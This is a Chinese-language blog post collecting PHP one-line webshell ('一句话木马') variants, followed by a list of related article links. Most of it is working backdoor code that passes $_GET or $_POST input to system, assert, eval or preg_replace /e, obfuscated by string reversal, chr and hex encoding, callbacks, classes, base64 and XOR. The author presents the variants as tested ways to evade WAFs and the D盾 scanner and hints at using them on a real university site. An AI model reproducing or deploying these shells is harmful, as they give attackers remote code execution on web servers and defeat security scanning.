说实话php我只是在w3c系统的看了30分钟，对不是3天30天3个小时是30分钟

那我能不能说我花半个小时接通了一门计算机语言呢（逃

需要记住的是：熟读PHP手册就会有不一样的发现

贴上来的都是亲测能用 php5.4.45 apache phpstudy环境

$_GET函数数据来源的web响应木马

@system($_GET['shell'])

@passthru($_GET['shell'])

同样也适用于以下变形

字符串(变量)变形

assert()相比较于eval()要灵活许多（只适用于php7.1以下版本）

substr_replace() //函数把字符串的一部分替换为另一个字符串

<?php
$a = substr_replace('assxxx','ert',3);
@$a($_POST['shell']);
?>

（PHP版本为7.2.10时挂马失败，php5.4.45时可以成功）

chr() //从指定 ASCII 值返回字符

<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);
@$a($_POST['shell']);
?>

strrev() //反转字符串。

<?php
$a = strrev('tressa');;
@$a($_POST['shell']);
?>

parse_str() //把查询字符串解析到变量中。

<?php
parse_str("name=assert");
$name($_POST['shell']);
?>

// \xhh hh十六进制编码的字符

<?php
$s = "\x61\x73\x73\x65\x72\x74";
@$s($_POST['shell']);
?>

// \ddd ddd八进制编码的字符，或者后向引用

<?php
$a = "\141\163\163\145\162\164";
$a($_POST['shell']);
?>

//通过中文乱码字符与strlen(),chr()函数相结合调用assert

<?php
$s = chr(strlen('R楝櫇賩矟m蛖?o礏!襔翻%豑翻%豑Ωv閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?o礏!捣?F襔翻%豑翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('楝櫇賩矟m蛖稤廕?赫?o!捣dl豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧')).chr(strlen('R楝櫇賩矟m蛖稤廕?赫?o礏!捣dl7o?F襔翻%豑Ωvn煓藩閁唁忽??e筡瑙kv闷T琷U逝Bi鰂衿i%_扈祓兽蒧'));$s($_POST['shell']);
?>

重新定义函数

<?php
function alexznb($a){
@assert($a);
}
alexznb($_POST['shell']);
?>

简要地说就是将原本一句马变形成一个函数，在此函数上定义木马语句，此原理反之亦然，在此就不多赘述

回调函数

回调函数的意思大概就是，在一个函数里，通过调用回调函数（系统函数库里的函数不能随便起名），把一个数组里的元素挨个传递给函数A，最后把函数A里面最后执行数组元素后的结果，一一呈现出来，这就是回调函数。

为了便于理解我编了如下基础的回调函数代码，试着看看或许能够更好地理解

大概就是这个意思，这里使用的是call_user_func_array()函数

我们在用该函数试试一句马：

<?php
@call_user_func_array(assert,array($_POST['shell']));
?>

很棒，上去了

(你们没有看到我的Tor browser)

回调函数变形：

为了便于理解源码，基本上每一行后面我都加了注释，为此我还很羞愧的恶补了20分钟的php面向对象编程的模块

<?phpclass loveme {     //类开始  php中通过class定义类public $x;   public $y;    //定义$x,$y两个类属性；PHP类属性内与变量非常相似，对象的属性可以存储单个值，值数组，甚至另一个对象。function __construct($a,$b) {      //定义方法 __construct$this->x=$a;      //使用this访问当前类的属性$x和$y，赋值给方法的$a,$b两个变量$this->y=$b;}function test() {      //定义方法 testarray_map($this->x,$this->y);       //方法内调用回调函数}}      //类结束$p1=new loveme(assert,array($_POST['shell']));      //从lovem类中创建对象命名为 p1$p1->test();       //对象$p1指向类loveme的test方法，相当于调用test?>

特殊字符链接干扰

基本变化形式

<?php
@$s = $_POST['shell'];$z = null;eval($z.$s);
?>

添加换行符（\n）

<?php
@$s = $_POST['shell'];$z = "\n";   eval($z.=$s);
?>

特别需要注意这里只能使用双引号，单引号不行因为php里的单引号把内容当成纯文本，不会经过服务器翻译。而双引号则与此相反。里面的内容会经过服务器处理(process).

\r 回车 (十六进制 0D)

\t 水平制表符 (十六进制 09)

https://www.php.net/manual/zh/regexp.reference.escape.php

php官方文档对转义字符的解释（中文的四级没过也能看得懂！）

preg_replace()函数

<?php
@preg_replace("/abcde/e", $_POST['shell'], "abcdefg");
?>

这个函数原本是利用正则表达式替换符合条件的字符串，但是这个函数有一个功能——可执行命令。这个函数的第一个参数是正则表达式，按照PHP的格式，表达式在两个“/”之间。如果我们在这个表达式的末尾加上“e”，那么这个函数的第二个参数就会被当作代码执行。

数组

一维数组

<?php
$a = substr_replace("assexx","rt",4);@$b=[''=>$a($_POST['shell'])];
?>

这里在$a里面还字符串变形了一次

<?php
$a = chr(0x61).chr(0x73).chr(0x73).chr(0x65).chr(0x72).chr(0x74);@$b=[''=>$a($_POST['shell'])];
?>

同样的变化，只是assert变为了十六进制字符组合后，放入一维数组 " " 中

多维数组

<?php
$b = substr_replace("assexx","rt",4);$a = array($arrayName = array('a' => $b($_POST['shell'])));
?>

类

用类把函数包裹,D盾对类查杀较弱

<?phpclass me{public $a = '';   //定义类A的属性$a为一个数组function __destruct(){   //定义__destruct方法assert("$this->a"); }}$b = new me;$b->a = $_POST['x'];?>

魔术常量

据说D盾对类的查杀较弱，可以使用类的魔术常量构造一句马

<?phpclass test {         //类 testfunction assert()    //定义了一个实例，命名为assert{$f = __FUNCTION__ ;@$f($_POST['shell']);}}$t = new test();$t->assert();?>

就是定义一个叫做test的类，然后创建一个叫做assert的方法，属性里面用魔术常量将方法名赋值给变量，最后创建一个实例以调用这个系统，挂刀试试：

舒服了，很舒服

（但是php7.1以上用不了，但估计陕西**大学的教务网也用不起那么高版本的php）

编码绕过

通过base64编码构造一句马基础：

<?php
$a = base64_decode("YXNzZXJ0");$a($_POST[x]);
?>

上一个综合较强的php一句马

（类，异或编码，字符拼接）（据说能绕D盾）

<?phpclass ZXVG{public $c='';public function __destruct(){$_0='&'^"\x47";$_1='C'^"\x30";$_2='A'^"\x32";$_3='v'^"\x13";$_4='J'^"\x38";$_5='f'^"\x12";$db=$_0.$_1.$_2.$_3.$_4.$_5;return @$db($this->c);}}$zxvg=new ZXVG();@$zxvg->c=$_POST['shell'];?>

以上总结都是基本形式，就像是乐高的基础部件，其中的每一段都能与任意无数的变种思路相结合，变化出无数种的形式，排列组合一定有一种能绕过所知的waf墙，那就看如何去灵活使用变化了

总结的话语总是那么的苍白无力，不如拿起电脑敲一敲试一试，在实践中的挂马总会是富有激情的探索之路。

无论在怎么样，这些一句话马也是只能应用于php7.1之下版本的服务器中，在往上的话，或许只能尝试大马或变态的eval()函数了；

over

基于php一句话木马的变种总结相关推荐

php过waf 一句话,(转)一句话木马绕过WAF
在渗透测试的后期,为了维持权限.我们通常都会选择使用大小马或者通过添加账户等各种各样的方式给自己留个后门.但是事情总不是一帆风顺的,在上传一句话木马以及使用一句话木马的过程中我们要跟WAF斗智斗勇.今 ...
如何把图片木马改成php格式,铭说 | 一句话木马的多种变形方式
原标题:铭说 | 一句话木马的多种变形方式今天来和大家聊一聊,一句话木马的多种变形方式. 经常有客户的网站碰到被上传小马和大马,这里的"马"是木马的意思,可不是真实的马. 通常, ...
php限制一个函数在几分钟内不被调用_在PHP一句话木马使用过程中的种种坑点分析...
前言在平时的学习和练习过程中,经常会遇到上传的一句话木马无法执行我们的命令或者说能执行命令但是不能连接菜刀蚁剑等webshell管理工具,以及各个版本PHP所限制的一些一句话木马的写法,不同版本we ...
php webshell 木马,消灭php webshell与一句话木马
总体来讲,对php webshell和一句话木马的查杀,主要从三个方面进行 1.Shell特征 2.PHP安全方面的函数和变量以及安全配置选项 3.语法检测首先,基于Shell特征,此方法主 ...
ASPX一句话木马详细分析
首先回顾一下以前ASP一句话的经典木马吧! <%if request("nonamed")<>"" then execute request( ...
利用动态二进制加密实现新型一句话木马之Java篇(转) 冰蝎
概述本系列文章重写了java..net.php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具.从而一劳永逸的绕过WAF或者其他网络防火墙的检测. 本来是想 ...
web安全的一句话木马
一.WEBshell Webshell就是以asp.php.jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门.黑客在入侵了一个网站后,通常会将asp或php后门文件与 ...
php冰蝎一句话,利用动态二进制加密实现新型一句话木马之PHP篇（转）冰蝎
概述本系列文章重写了java..net.php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具.从而一劳永逸的绕过WAF或者其他网络防火墙的检测. 本来是想 ...
利用动态二进制加密实现新型一句话木马之.NET篇（转）冰蝎
概述本系列文章重写了java..net.php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具.从而一劳永逸的绕过WAF或者其他网络防火墙的检测.当然,截止 ...

基于php一句话木马的变种总结